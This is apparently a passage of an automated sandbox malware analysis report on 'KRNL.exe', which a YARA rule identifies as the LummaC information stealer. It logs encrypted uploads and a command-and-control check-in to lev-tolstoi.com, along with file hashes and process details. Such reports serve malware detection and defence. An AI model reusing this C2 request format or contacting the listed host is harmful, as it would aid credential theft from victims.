                                                                                                                                                                                                                                                        Data Ascii: 7$x!~.5z%3iE~4SMAIph! {2'=n}Q'\YE~0}:|O/.`(#~B|Wme@#wq+RCPZ>yp#.vbc3\znWPH94.I=MTEDbZ9$~t|CI]
                                                                                                                                                                                                                                                        2025-01-01 20:28:08 UTC15331OUTData Raw: 54 66 98 2b 2e b5 5f d0 d3 57 51 54 b9 af fc 0c 69 83 ec 33 18 8e 91 d1 ed 3f 11 46 af 75 7d 64 b6 93 41 14 00 e5 a5 e3 e5 e5 06 5e 71 00 1f bc a0 5d 1f 2e ed e8 c7 99 ca b8 0c 08 fd 7e c1 e9 6e c6 9f 75 db eb da 8d 8a d7 33 54 b8 32 e7 48 fa 5b f6 96 8b 5a 57 69 dc e0 0f c1 a2 5b ad 5c be 73 6c ed 98 39 24 25 b3 52 65 d3 9e 9d 3e 69 eb 7d 15 e8 d3 d2 8f 66 b4 86 e6 d3 d4 b9 09 c1 bb d2 a7 6c e0 38 f8 6f 4a ff b7 9e c1 9b 86 80 50 00 f5 e0 25 8d 6d 38 c2 c1 ce df d6 c6 3f d0 b3 83 36 5e 17 04 6d 8d 9d e4 54 31 0f ee 20 1f cb ef 62 73 7a 8d 05 62 94 32 07 df cb 01 ad 23 b4 eb 9f d3 72 15 5b 6e 07 68 3f 0e ff 7c c7 f8 96 16 98 2e 89 6a 40 54 7a 9f 38 12 84 89 b2 16 00 b7 50 68 de a5 53 ce 84 49 d1 61 57 29 99 5d 75 f9 5e dd 52 7f 93 3c a5 c6 04 4d ca 30 90
                                                                                                                                                                                                                                                        Data Ascii: Tf+._WQTi3?Fu}dA^q].~nu3T2H[ZWi[\sl9$%Re>i}fl8oJP%m8?6^mT1 bszb2#r[nh?|.j@Tz8PhSIaW)]u^R<M0
                                                                                                                                                                                                                                                        2025-01-01 20:28:08 UTC15331OUTData Raw: 46 c0 17 56 b3 00 7e de 52 81 a6 aa 8b 80 d8 67 7d 01 4f 45 94 ba 54 20 34 f6 bc 63 d5 cb e2 0e 1b c2 f5 2d c4 3d 07 b9 63 be a0 5e 9d d1 b7 10 b3 1e 06 d3 e0 d0 0b 8b e1 2a 7d f0 61 d9 96 09 2a 15 3b eb 4f 43 85 e1 20 49 d4 f9 d5 4a 9d 23 61 32 5b a3 81 65 03 dc 1a dd 91 44 42 47 1b e2 52 6f a1 1f df 45 21 90 d4 66 d2 78 7b dd d8 a9 29 30 55 66 4f 31 ca ec 9e 85 f0 86 c4 ea 5e e9 77 05 44 2f 51 61 2d ab be b0 a8 b0 49 dc 3b f3 36 cc 11 37 ad 2b 98 f3 50 ec e2 15 97 08 63 5e 95 7e 37 4b 2f d3 d1 5c 82 3f b7 1f 46 78 4c 27 c7 33 ba eb 37 6b f7 4e f0 1c bb 62 2a 8c 0a a5 ae cf 0c d1 77 c3 4a b3 bc 3a a5 d8 b2 f4 69 37 ed 0c 80 a3 c2 cc d6 bc e1 eb 7a 13 d9 01 f1 9b 56 ba ed d9 0c 29 ce 55 03 ea b5 36 42 57 0f db e3 28 56 57 e1 b2 aa 1e b8 a4 5d 98 36 98 ac
                                                                                                                                                                                                                                                        Data Ascii: FV~Rg}OET 4c-=c^*}a*;OC IJ#a2[eDBGRoE!fx{)0UfO1^wD/Qa-I;67+Pc^~7K/\?FxL'37kNb*wJ:i7zV)U6BW(VW]6
                                                                                                                                                                                                                                                        2025-01-01 20:28:08 UTC15331OUTData Raw: a8 f5 57 73 eb ed f9 80 8e 68 c1 37 c6 cb 83 23 72 e0 9d 8c 1e 12 3c ed 13 4d 37 0f f9 b1 dd b2 3f d9 e4 ea d6 8f 67 c2 1a e0 e4 ba 9d 3a ff 67 80 e3 6a 25 2c 11 57 c8 0b 74 d6 6e 7b dd ba eb 7c 94 fa 03 89 f6 ab bd f5 2e 49 0e fc 96 3b a5 8b 7b 5e 27 0e e1 b8 2a 01 55 d2 37 3f aa 24 bc c5 10 6d 6b 50 d8 41 e5 dd e8 63 7b 8d 60 47 48 b6 0a 1c ae bf 9e 16 e6 a6 d2 b8 db 84 f7 f4 e8 bb 4e 7c 5e d4 50 cc fc 55 b3 b4 0e f1 5b 44 a1 cf 0e d4 ae e4 d0 81 3b 72 1b f6 d7 d6 3e 8a e0 b9 2f e8 a2 34 8c e1 21 41 25 c5 04 cb 6c c1 d7 47 b5 3e 45 bf d9 64 1f 29 f6 80 b2 9d bc d4 a5 bd a8 14 17 ec dc 78 b1 f0 5d e7 e6 48 5e 16 86 e3 66 26 3d 8d 81 70 73 ae cd d8 f1 b5 b7 35 d1 47 b0 fa ad dc 4e 27 03 c5 b5 da 38 52 15 1f 3e 31 58 43 af 4d 6c 8e 46 18 36 f9 9b 45 f0 ae
                                                                                                                                                                                                                                                        Data Ascii: Wsh7#r<M7?g:gj%,Wtn{|.I;{^'*U7?$mkPAc{`GHN|^PU[D;r>/4!A%lG>Ed)x]H^f&=ps5GN'8R>1XCMlF6E
                                                                                                                                                                                                                                                        2025-01-01 20:28:12 UTC1131INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                        Date: Wed, 01 Jan 2025 20:28:12 GMT
                                                                                                                                                                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                        Set-Cookie: PHPSESSID=ap3nd5k78kiqthj9nfi8ja9t9s; expires=Sun, 27 Apr 2025 14:14:48 GMT; Max-Age=9999999; path=/
                                                                                                                                                                                                                                                        Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                                                                                                                        Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                                                                                                                                        Pragma: no-cache
                                                                                                                                                                                                                                                        X-Frame-Options: DENY
                                                                                                                                                                                                                                                        X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                        X-XSS-Protection: 1; mode=block
                                                                                                                                                                                                                                                        cf-cache-status: DYNAMIC
                                                                                                                                                                                                                                                        vary: accept-encoding
                                                                                                                                                                                                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=fsojRMVTTYhHW14VlRUMa8EPNmI%2FBBf6Zyu0d9lPmkaOnjmayeqDqeeLHEBYbWt1EjwnGsW8cQA9%2FJafpzhaNoB2iqGJSLEpPSBHB0uzsxgzf75%2FqVlrv3prtg4W3W5ekOQ%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                        Server: cloudflare
                                                                                                                                                                                                                                                        CF-RAY: 8fb54106fcabf797-EWR
                                                                                                                                                                                                                                                        alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                        server-timing: cfL4;desc="?proto=TCP&rtt=1528&min_rtt=1486&rtt_var=587&sent=210&recv=587&lost=0&retrans=0&sent_bytes=2834&recv_bytes=570853&delivery_rate=1965006&cwnd=162&unsent_bytes=0&cid=51364f500c4f09a9&ts=4739&x=0"


                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                        8192.168.2.449741172.67.157.2544432120C:\Users\user\Desktop\KRNL.exe
                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                        2025-01-01 20:28:13 UTC263OUTPOST /api HTTP/1.1
                                                                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                        Content-Length: 86
                                                                                                                                                                                                                                                        Host: lev-tolstoi.com
                                                                                                                                                                                                                                                        2025-01-01 20:28:13 UTC86OUTData Raw: 61 63 74 3d 67 65 74 5f 6d 65 73 73 61 67 65 26 76 65 72 3d 34 2e 30 26 6c 69 64 3d 79 61 75 36 4e 61 2d 2d 36 32 39 39 31 32 35 33 35 26 6a 3d 26 68 77 69 64 3d 33 42 44 32 35 31 32 33 38 44 43 35 33 31 46 31 42 43 46 44 36 38 42 37 37 34 45 46 39 42 37 41
                                                                                                                                                                                                                                                        Data Ascii: act=get_message&ver=4.0&lid=yau6Na--629912535&j=&hwid=3BD251238DC531F1BCFD68B774EF9B7A
                                                                                                                                                                                                                                                        2025-01-01 20:28:13 UTC1119INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                        Date: Wed, 01 Jan 2025 20:28:13 GMT
                                                                                                                                                                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                        Set-Cookie: PHPSESSID=5b78ormml84dsg09s4qbrmgcg5; expires=Sun, 27 Apr 2025 14:14:52 GMT; Max-Age=9999999; path=/
                                                                                                                                                                                                                                                        Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                                                                                                                        Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                                                                                                                                        Pragma: no-cache
                                                                                                                                                                                                                                                        X-Frame-Options: DENY
                                                                                                                                                                                                                                                        X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                        X-XSS-Protection: 1; mode=block
                                                                                                                                                                                                                                                        cf-cache-status: DYNAMIC
                                                                                                                                                                                                                                                        vary: accept-encoding
                                                                                                                                                                                                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=hD1de9pApDRO1aGXsRh8egqNOFAo6Zb9kpuosgRT3ZnbRY142d0P1TV8TcRcJHCqs9pnZ7z4pNZmvoNQfefs3fWkXURA%2BuIyl2Wwd2EHmdzF87a4VwY9b1ygxHLjUJhCFUo%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                        Server: cloudflare
                                                                                                                                                                                                                                                        CF-RAY: 8fb541279f7e41af-EWR
                                                                                                                                                                                                                                                        alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                        server-timing: cfL4;desc="?proto=TCP&rtt=1699&min_rtt=1692&rtt_var=649&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2835&recv_bytes=985&delivery_rate=1666666&cwnd=224&unsent_bytes=0&cid=29d532e9b94a0294&ts=483&x=0"
                                                                                                                                                                                                                                                        2025-01-01 20:28:13 UTC250INData Raw: 65 30 31 0d 0a 30 78 41 36 65 4c 63 4b 4b 49 78 6b 75 5a 56 2b 43 77 76 6e 4c 46 4d 68 30 44 4e 4b 54 6e 49 6e 33 74 2f 36 2b 58 44 2f 6b 54 75 49 61 78 67 65 77 79 67 53 76 55 69 62 38 46 77 78 4f 73 73 4f 4e 77 50 71 45 58 67 65 4a 68 61 72 74 71 79 59 52 71 76 6d 43 72 52 57 44 7a 32 50 62 58 7a 62 4e 74 69 6e 4b 31 39 4b 67 46 78 6d 56 61 68 42 4d 7a 63 5a 55 35 32 79 75 35 59 78 6c 4f 42 74 6f 58 38 49 54 76 31 4d 57 76 77 30 2f 64 49 2f 55 32 43 7a 56 52 46 76 69 6e 55 34 46 43 42 71 6e 5a 79 55 6c 45 4f 34 35 48 65 59 51 77 6f 7a 37 6b 6c 50 7a 7a 66 4e 2f 30 34 79 61 59 68 41 42 46 53 37 43 77 51 58 4d 45 4b 4d 6a 37 4f 38 51 5a 54 47 54 37 39 56 54 54 48 38 62 30 72 76 42 59 48 6d 44 6b 64 61 69 48 55 59 59 4a 70 34 65 7a 73 47 64
                                                                                                                                                                                                                                                        Data Ascii: e010xA6eLcKKIxkuZV+CwvnLFMh0DNKTnIn3t/6+XD/kTuIaxgewygSvUib8FwxOssONwPqEXgeJhartqyYRqvmCrRWDz2PbXzbNtinK19KgFxmVahBMzcZU52yu5YxlOBtoX8ITv1MWvw0/dI/U2CzVRFvinU4FCBqnZyUlEO45HeYQwoz7klPzzfN/04yaYhABFS7CwQXMEKMj7O8QZTGT79VTTH8b0rvBYHmDkdaiHUYYJp4ezsGd
                                                                                                                                                                                                                                                        2025-01-01 20:28:13 UTC1369INData Raw: 36 71 63 6f 6f 78 45 72 39 52 75 6e 46 59 43 4d 65 64 7a 66 38 38 6f 32 73 45 51 61 55 4f 50 54 6a 70 44 6f 32 6b 37 4a 53 4e 70 76 34 36 38 76 68 4b 38 78 6b 6a 69 57 6c 77 65 39 56 6c 42 37 7a 48 52 7a 51 35 47 54 4c 51 65 41 42 57 47 58 7a 30 65 41 55 69 38 6a 70 79 36 51 37 6a 6b 57 62 46 54 43 6a 50 37 53 55 50 4c 4e 38 7a 73 48 57 56 76 31 30 41 45 56 4c 73 4c 42 42 63 77 51 6f 79 64 73 37 78 42 75 4d 4a 57 76 30 56 7a 4d 66 78 73 53 75 38 46 67 65 59 55 52 31 71 58 53 78 68 67 6d 6e 68 34 41 53 59 57 71 37 61 73 73 6b 61 72 35 67 71 30 56 67 38 39 6a 32 31 38 32 7a 4c 59 70 7a 74 66 53 6f 42 63 5a 6d 2b 6f 51 54 41 64 47 56 4f 64 73 72 75 57 4d 5a 54 6a 58 75 70 41 62 55 37 39 58 46 72 38 4e 50 33 4e 4c 31 4e 67 73 31 55 53 62 34 70 31 4f 42 51 67
                                                                                                                                                                                                                                                        Data Ascii: 6qcooxEr9RunFYCMedzf88o2sEQaUOPTjpDo2k7JSNpv468vhK8xkjiWlwe9VlB7zHRzQ5GTLQeABWGXz0eAUi8jpy6Q7jkWbFTCjP7SUPLN8zsHWVv10AEVLsLBBcwQoyds7xBuMJWv0VzMfxsSu8FgeYUR1qXSxhgmnh4ASYWq7asskar5gq0Vg89j2182zLYpztfSoBcZm+oQTAdGVOdsruWMZTjXupAbU79XFr8NP3NL1Ngs1USb4p1OBQg
                                                                                                                                                                                                                                                        2025-01-01 20:28:13 UTC1369INData Raw: 2b 51 4a 70 36 6e 62 36 51 68 58 54 36 43 54 78 44 72 4d 4f 37 48 48 7a 6c 65 73 32 30 30 55 65 56 48 4d 6a 77 4c 58 72 57 72 75 5a 51 78 6b 4e 42 51 6f 55 6b 44 4b 4f 41 38 59 74 6f 57 79 63 55 36 58 45 71 2f 52 77 64 59 6b 6e 30 51 43 41 42 39 6a 4a 4b 35 75 68 36 53 6f 6e 79 6c 58 48 45 72 68 30 46 78 7a 77 50 36 78 67 70 68 4f 39 35 4f 50 45 32 48 52 69 46 32 50 48 36 63 75 71 69 70 4f 62 71 67 55 49 52 6b 56 6a 33 41 51 32 50 70 42 74 72 30 52 6e 68 37 71 33 30 6a 52 70 74 79 41 41 56 41 64 34 72 75 6a 35 41 6d 6e 71 64 76 70 43 46 64 50 6f 4a 50 45 4f 73 77 37 73 63 66 4f 56 36 7a 62 54 52 52 35 55 63 79 50 41 74 65 74 61 75 35 6c 44 47 51 30 46 43 68 53 51 4d 6f 34 44 78 69 32 68 62 4a 78 54 70 63 53 72 39 48 42 31 69 53 66 52 41 49 41 48 32 4d 6b
                                                                                                                                                                                                                                                        Data Ascii: +QJp6nb6QhXT6CTxDrMO7HHzles200UeVHMjwLXrWruZQxkNBQoUkDKOA8YtoWycU6XEq/RwdYkn0QCAB9jJK5uh6SonylXHErh0FxzwP6xgphO95OPE2HRiF2PH6cuqipObqgUIRkVj3AQ2PpBtr0Rnh7q30jRptyAAVAd4ruj5AmnqdvpCFdPoJPEOsw7scfOV6zbTRR5UcyPAtetau5lDGQ0FChSQMo4Dxi2hbJxTpcSr9HB1iSfRAIAH2Mk
                                                                                                                                                                                                                                                        2025-01-01 20:28:13 UTC604INData Raw: 71 79 46 58 34 65 6c 55 62 32 6d 42 42 2b 78 66 79 78 79 77 2f 66 70 31 34 4f 67 72 68 65 7a 6f 44 47 6d 53 73 68 63 4b 4d 50 6f 37 6d 62 72 30 6c 57 41 2f 72 4a 55 66 42 48 66 54 38 46 30 31 74 76 33 42 38 51 34 5a 6c 50 68 73 64 58 65 65 72 6b 61 73 36 6c 66 35 34 74 79 64 4a 4e 70 77 37 66 38 6b 70 30 61 63 59 59 6a 4b 6a 46 47 4d 4b 76 6d 4a 37 4f 6a 34 57 76 4f 72 43 73 41 6a 4b 2b 6c 43 31 56 31 63 56 32 48 39 6c 39 68 43 4e 35 42 5a 2b 66 4e 56 6d 50 33 33 2f 58 43 45 63 53 6e 76 78 71 4c 66 53 48 4a 72 39 51 59 74 48 43 68 66 61 59 6c 79 34 45 65 50 43 43 54 68 39 6b 30 30 32 45 5a 59 4c 47 67 55 39 45 5a 33 6f 76 70 38 45 6d 2f 42 77 34 58 74 75 4f 74 39 61 54 38 41 55 2f 2b 30 36 61 6e 75 6b 51 52 4a 4f 6b 56 67 37 5a 52 59 54 73 37 47 77 79 41
                                                                                                                                                                                                                                                        Data Ascii: qyFX4elUb2mBB+xfyxyw/fp14OgrhezoDGmSshcKMPo7mbr0lWA/rJUfBHfT8F01tv3B8Q4ZlPhsdXeerkas6lf54tydJNpw7f8kp0acYYjKjFGMKvmJ7Oj4WvOrCsAjK+lC1V1cV2H9l9hCN5BZ+fNVmP33/XCEcSnvxqLfSHJr9QYtHChfaYly4EePCCTh9k002EZYLGgU9EZ3ovp8Em/Bw4XtuOt9aT8AU/+06anukQRJOkVg7ZRYTs7GwyA
                                                                                                                                                                                                                                                        2025-01-01 20:28:13 UTC1369INData Raw: 32 38 36 37 0d 0a 6e 6b 49 47 66 51 35 63 65 6f 54 34 50 6b 78 55 7a 6d 76 58 68 56 59 34 42 67 4c 4f 78 6c 2f 6d 35 47 4c 6b 6a 75 6d 30 6c 79 51 51 30 68 4e 68 45 35 68 34 44 62 6f 32 68 39 48 62 59 68 67 4e 30 6d 4d 48 41 67 6e 4a 78 4f 6b 68 70 2b 49 4a 62 37 61 64 4c 46 7a 66 68 76 6d 4f 46 6e 64 46 4e 37 65 50 30 46 41 73 55 35 34 57 35 34 43 45 42 63 6e 58 2b 72 75 6e 62 39 47 69 62 70 4d 70 56 70 6f 4b 34 4a 5a 66 4f 63 75 33 65 63 77 57 32 6a 65 54 51 46 69 71 47 49 72 50 43 34 49 37 70 43 4c 76 68 36 56 78 31 61 35 61 45 73 50 35 46 59 48 39 6a 65 42 39 6a 42 66 61 71 31 41 48 30 79 6a 64 79 77 6f 4f 32 6d 6d 6a 73 6d 38 50 6f 37 36 63 49 70 54 58 54 76 6b 5a 6c 76 41 43 64 71 68 43 7a 6c 59 30 55 59 47 56 70 39 62 45 69 45 32 59 4b 32 52 72 34
                                                                                                                                                                                                                                                        Data Ascii: 2867nkIGfQ5ceoT4PkxUzmvXhVY4BgLOxl/m5GLkjum0lyQQ0hNhE5h4Dbo2h9HbYhgN0mMHAgnJxOkhp+IJb7adLFzfhvmOFndFN7eP0FAsU54W54CEBcnX+runb9GibpMpVpoK4JZfOcu3ecwW2jeTQFiqGIrPC4I7pCLvh6Vx1a5aEsP5FYH9jeB9jBfaq1AH0yjdywoO2mmjsm8Po76cIpTXTvkZlvACdqhCzlY0UYGVp9bEiE2YK2Rr4
                                                                                                                                                                                                                                                        2025-01-01 20:28:13 UTC1369INData Raw: 53 59 5a 52 66 56 50 47 57 6b 72 64 43 76 71 6d 46 48 4a 6d 6b 30 63 43 61 37 70 63 43 53 77 51 53 4a 44 30 79 36 34 32 73 76 6c 65 34 31 56 54 49 74 77 68 48 64 6c 55 69 4f 55 79 4f 32 58 65 53 6d 70 57 74 51 41 39 4e 68 42 49 37 34 2b 7a 77 53 4f 77 34 57 66 38 63 57 67 6f 2f 6b 38 5a 35 7a 7a 31 30 77 52 4b 4f 61 77 48 43 58 4f 57 66 69 59 74 51 47 36 52 6c 72 75 64 41 49 58 59 63 70 64 30 55 31 50 41 4d 6b 4c 30 4c 59 2f 37 52 33 74 4f 33 30 73 48 64 6f 4a 51 4f 52 59 2f 5a 6f 75 76 7a 35 55 31 6c 75 68 74 71 55 6c 35 54 39 35 6d 62 75 49 6a 38 2b 55 31 62 31 69 33 65 6d 42 52 67 48 38 51 43 79 64 50 6b 62 53 73 67 30 57 51 78 77 6d 6d 61 6c 4e 54 68 48 74 2f 37 52 44 34 33 79 39 67 54 64 5a 5a 46 42 57 44 43 69 42 2b 53 30 57 49 75 4a 47 2b 4d 59 6a
                                                                                                                                                                                                                                                        Data Ascii: SYZRfVPGWkrdCvqmFHJmk0cCa7pcCSwQSJD0y642svle41VTItwhHdlUiOUyO2XeSmpWtQA9NhBI74+zwSOw4Wf8cWgo/k8Z5zz10wRKOawHCXOWfiYtQG6RlrudAIXYcpd0U1PAMkL0LY/7R3tO30sHdoJQORY/Zouvz5U1luhtqUl5T95mbuIj8+U1b1i3emBRgH8QCydPkbSsg0WQxwmmalNThHt/7RD43y9gTdZZFBWDCiB+S0WIuJG+MYj
                                                                                                                                                                                                                                                        2025-01-01 20:28:13 UTC1369INData Raw: 6e 41 4a 78 33 39 66 39 41 6a 59 32 69 35 36 57 49 42 66 4a 55 6d 6d 59 6a 6b 46 47 56 2f 31 73 59 4f 65 4b 5a 48 77 58 72 45 67 66 43 6d 4f 59 58 6e 47 4d 66 4c 74 4d 55 5a 6f 72 48 67 79 61 2b 46 35 41 6e 38 32 55 66 57 7a 6c 72 4d 7a 72 64 4a 6e 2f 46 74 67 48 65 56 4a 55 4c 38 64 31 64 41 53 51 33 75 47 57 52 46 53 34 45 51 38 50 53 41 52 69 70 32 52 69 78 79 36 77 32 2b 62 53 67 67 36 68 57 30 62 79 6c 44 51 30 54 31 45 51 71 68 6d 43 6b 53 38 55 68 39 35 47 48 57 6f 74 4c 66 42 47 6f 66 59 44 62 30 70 53 6a 32 50 62 58 7a 62 4e 75 71 67 43 6b 6f 2f 71 56 67 6b 56 59 4a 59 48 68 34 63 63 2b 65 46 77 71 73 49 71 2b 74 4d 2b 43 42 32 51 59 55 7a 54 65 52 54 39 63 39 4c 58 55 36 54 57 79 5a 69 75 51 55 66 4a 68 6c 69 71 75 6d 56 6e 77 69 53 77 33 47 2b
                                                                                                                                                                                                                                                        Data Ascii: nAJx39f9AjY2i56WIBfJUmmYjkFGV/1sYOeKZHwXrEgfCmOYXnGMfLtMUZorHgya+F5An82UfWzlrMzrdJn/FtgHeVJUL8d1dASQ3uGWRFS4EQ8PSARip2Rixy6w2+bSgg6hW0bylDQ0T1EQqhmCkS8Uh95GHWotLfBGofYDb0pSj2PbXzbNuqgCko/qVgkVYJYHh4cc+eFwqsIq+tM+CB2QYUzTeRT9c9LXU6TWyZiuQUfJhliqumVnwiSw3G+
                                                                                                                                                                                                                                                        2025-01-01 20:28:13 UTC1369INData Raw: 42 34 61 72 68 50 2b 76 4d 71 66 56 6d 41 56 42 42 34 75 48 39 39 47 7a 5a 77 6a 4c 79 4a 6f 51 53 70 36 56 2b 50 50 33 51 6f 31 47 4a 37 2b 52 48 44 30 6a 56 35 66 4c 4a 45 4d 57 2b 41 56 53 6b 68 4f 47 69 39 37 72 53 44 50 36 65 68 62 36 70 54 41 68 54 78 54 47 54 61 4b 66 72 57 46 55 55 7a 70 68 38 57 62 36 46 59 41 52 63 78 51 4a 32 4d 6c 72 78 62 6d 2f 31 63 76 53 42 44 47 65 73 6c 41 2b 4d 75 36 36 4d 4a 59 6b 4f 74 61 54 42 4b 68 31 41 57 59 51 59 57 6b 62 4f 41 6e 69 53 46 70 58 65 44 51 46 42 4f 39 6b 68 6b 77 54 33 36 6f 51 70 52 51 61 78 32 46 6b 50 6d 42 6a 35 38 52 51 7a 74 68 72 4b 41 50 70 7a 6a 63 4c 78 6d 62 53 53 59 51 52 48 32 4e 2f 66 62 46 55 6c 75 73 32 6b 53 53 71 4a 71 4c 6a 6b 75 43 4f 2b 4b 74 62 67 78 7a 50 74 73 6b 6b 68 52 44
                                                                                                                                                                                                                                                        Data Ascii: B4arhP+vMqfVmAVBB4uH99GzZwjLyJoQSp6V+PP3Qo1GJ7+RHD0jV5fLJEMW+AVSkhOGi97rSDP6ehb6pTAhTxTGTaKfrWFUUzph8Wb6FYARcxQJ2Mlrxbm/1cvSBDGeslA+Mu66MJYkOtaTBKh1AWYQYWkbOAniSFpXeDQFBO9khkwT36oQpRQax2FkPmBj58RQzthrKAPpzjcLxmbSSYQRH2N/fbFUlus2kSSqJqLjkuCO+KtbgxzPtskkhRD
                                                                                                                                                                                                                                                        2025-01-01 20:28:13 UTC1369INData Raw: 62 4c 2b 6e 5a 54 46 78 62 30 6d 5a 71 65 4a 63 44 65 58 6f 54 55 59 71 35 6b 6f 73 37 71 66 34 4e 76 53 6c 4b 50 59 39 74 66 4e 73 32 32 4e 77 58 58 6b 71 4b 52 48 68 56 35 56 67 73 46 69 64 55 35 37 71 53 79 54 47 7a 79 57 4f 43 59 56 64 50 68 54 4e 6a 76 54 54 4b 34 43 34 39 53 59 31 57 65 48 66 6b 61 54 68 38 48 6d 4f 6f 73 61 4b 58 4f 62 44 65 59 35 67 70 66 7a 36 47 5a 48 6e 49 46 2b 2f 57 45 54 49 37 6f 6c 31 6b 62 59 55 4b 4d 44 6b 56 5a 49 79 34 6e 62 55 70 76 66 78 49 73 58 4e 6f 4c 66 78 79 45 65 6f 56 77 39 67 76 50 55 4f 37 41 77 64 4f 34 47 6b 2f 4e 6a 70 45 70 71 79 55 69 6a 61 4d 2f 48 50 68 52 48 41 7a 2f 6c 70 62 36 77 58 51 77 6a 68 53 62 4b 70 34 50 32 71 34 63 43 51 4d 57 58 2b 32 70 34 75 44 47 34 58 2b 59 6f 5a 66 66 68 53 46 50 48
                                                                                                                                                                                                                                                        Data Ascii: bL+nZTFxb0mZqeJcDeXoTUYq5kos7qf4NvSlKPY9tfNs22NwXXkqKRHhV5VgsFidU57qSyTGzyWOCYVdPhTNjvTTK4C49SY1WeHfkaTh8HmOosaKXObDeY5gpfz6GZHnIF+/WETI7ol1kbYUKMDkVZIy4nbUpvfxIsXNoLfxyEeoVw9gvPUO7AwdO4Gk/NjpEpqyUijaM/HPhRHAz/lpb6wXQwjhSbKp4P2q4cCQMWX+2p4uDG4X+YoZffhSFPH


                                                                                                                                                                                                                                                        Statistics

                                                                                                                                                                                                                                                        CPU Usage

                                                                                                                                                                                                                                                        Click to jump to process

                                                                                                                                                                                                                                                        Memory Usage

                                                                                                                                                                                                                                                        Click to jump to process

                                                                                                                                                                                                                                                        High Level Behavior Distribution

                                                                                                                                                                                                                                                        Click to dive into process behavior distribution

                                                                                                                                                                                                                                                        Behavior

                                                                                                                                                                                                                                                        Click to jump to process

                                                                                                                                                                                                                                                        System Behavior

                                                                                                                                                                                                                                                        General

                                                                                                                                                                                                                                                        Target ID:0
                                                                                                                                                                                                                                                        Start time:15:27:56
                                                                                                                                                                                                                                                        Start date:01/01/2025
                                                                                                                                                                                                                                                        Path:C:\Users\user\Desktop\KRNL.exe
                                                                                                                                                                                                                                                        Wow64 process (32bit):true
                                                                                                                                                                                                                                                        Commandline:"C:\Users\user\Desktop\KRNL.exe"
                                                                                                                                                                                                                                                        Imagebase:0x6e0000
                                                                                                                                                                                                                                                        File size:567'848 bytes
                                                                                                                                                                                                                                                        MD5 hash:976A25D2FED5FC7C8700588A33C6826C
                                                                                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                        Yara matches:
                                                                                                                                                                                                                                                        • Rule: JoeSecurity_LummaCStealer_4, Description: Yara detected LummaC Stealer, Source: 00000000.00000002.1676084823.00000000043BD000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                                                                        Has exited:true

                                                                                                                                                                                                                                                        General

                                                                                                                                                                                                                                                        Target ID:1
                                                                                                                                                                                                                                                        Start time:15:27:56
                                                                                                                                                                                                                                                        Start date:01/01/2025
                                                                                                                                                                                                                                                        Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                                                                                                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                                        Imagebase:0x7ff7699e0000
                                                                                                                                                                                                                                                        File size:862'208 bytes
                                                                                                                                                                                                                                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                        Reputation:high
                                                                                                                                                                                                                                                        Has exited:true

                                                                                                                                                                                                                                                        General

                                                                                                                                                                                                                                                        Target ID:2
                                                                                                                                                                                                                                                        Start time:15:27:56
                                                                                                                                                                                                                                                        Start date:01/01/2025
                                                                                                                                                                                                                                                        Path:C:\Users\user\Desktop\KRNL.exe
                                                                                                                                                                                                                                                        Wow64 process (32bit):true
                                                                                                                                                                                                                                                        Commandline:"C:\Users\user\Desktop\KRNL.exe"
                                                                                                                                                                                                                                                        Imagebase:0x6e0000
                                                                                                                                                                                                                                                        File size:567'848 bytes
                                                                                                                                                                                                                                                        MD5 hash:976A25D2FED5FC7C8700588A33C6826C
                                                                                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                        Yara matches:
                                                                                                                                                                                                                                                        • Rule: JoeSecurity_LummaCStealer_4, Description: Yara detected LummaC Stealer, Source: 00000002.00000002.2915370976.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
